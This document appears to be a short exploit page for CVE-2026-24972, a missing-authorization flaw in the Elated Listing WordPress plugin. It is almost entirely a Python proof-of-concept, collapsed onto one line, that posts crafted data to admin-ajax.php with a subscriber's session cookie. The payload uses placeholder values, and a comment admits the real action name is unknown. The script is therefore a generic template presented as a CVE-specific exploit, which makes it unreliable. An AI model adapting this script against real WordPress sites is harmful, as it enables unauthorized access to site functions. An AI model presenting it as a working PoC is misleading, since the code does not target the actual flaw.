CVE-2026-24972: Elated Listing插件权限绕过漏洞

import requests def exploit_missing_authorization(target_url, cookie): """ PoC for CVE-2026-24972 Missing Authorization """ # The vulnerable endpoint is typically admin-ajax.php in WordPress ajax_url = f"{target_url}/wp-admin/admin-ajax.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } # Payload to trigger the vulnerability # 'action' parameter needs to be identified through source code analysis or fuzzing payload = { "action": "eltd_listing_affected_action", "param": "malicious_data" } cookies = { "wordpress_logged_in_hash": cookie } try: response = requests.post(ajax_url, data=payload, headers=headers, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully. Check if impact occurred.") print(response.text) else: print("[-] Request failed.") except Exception as e: print(f"[!] Error: {e}") # Usage example # exploit_missing_authorization("http://target-wordpress-site.com", "subscriber_cookie_value")